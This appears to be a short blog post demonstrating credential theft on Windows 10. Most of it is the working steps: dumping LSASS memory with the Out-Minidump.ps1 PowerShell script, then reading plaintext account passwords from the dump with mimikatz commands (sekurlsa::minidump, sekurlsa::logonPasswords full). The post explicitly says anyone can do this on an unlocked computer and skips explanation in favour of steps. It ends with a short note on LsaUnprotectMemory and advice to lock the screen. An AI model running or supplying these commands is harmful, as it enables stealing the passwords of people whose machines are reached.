I have come across this Windows password vulnerability as mentioned in this article. So, I tried to reproduce the steps to see if the vulnerability is still there, and the result is really shocking me.
Yep, even in Windows 10, the method is still working nicely. The method is not new at all. So, let me show how you can reproduce it by using a simple exploitation tool and a PowerShell script. Anyone can perform this hacking when you left your Windows unlocked. I’m not really going to explain the details, just went straight to the steps.
Getting started
First, you need to download or get this tool called mimikatz (just get the binary package, e.g. mimikatz_trunk.zip) and this PowerShell script Out-Minidump.ps1 by Matthew Graeber. Let’s start!
Using PowerShell to perform memory dump
To perform the LSASS dump, we will use the PowerShell script, Out-Minidump.ps1. The flow of cmdlet will look like this:
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# "dot sourcing" method to import function from the script
Get-Process lsass | Out-Minidump
# To perform the LSASS dump
Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# Copy the dump file to desired location
Using mimikatz terminal program to view the passwords
As you can see, lsass_868.dmp is the example of LSASS dump file captured using the PowerShell script. Now, it’s time we use the mimikatz terminal to load in the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
Switching to MINIDUMP file, so now we can view the passwords. Now, run this command to display all the accounts and passwords available:
sekurlsa::logonPasswords full
Tadaa… Now I can see my actual Microsoft Account username and password in a plain text. As you imagine, most of people nowadays are still using the same password for almost everything. Too bad.. So, I expected you can picture all the consequences with this vulnerability…
The existing vulnerability info
The fact is that the password is encrypted but it’s useless as the implementation depends on two basic Win32 functions; LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). And Windows stores encrypted user passwords in memory without using one-way hash which is decryptable using LsaUnprotectMemory function to a plain text.
The bottom line
You will be safe as long as you always lock your computer when you’re away. This short article is just to remind me or anyone else to always be careful in whatever we do especially with anything to do with our passwords and personal credential information. No system is perfect! So, DON’T EVER LEAVE YOUR COMPUTER UNLOCKED!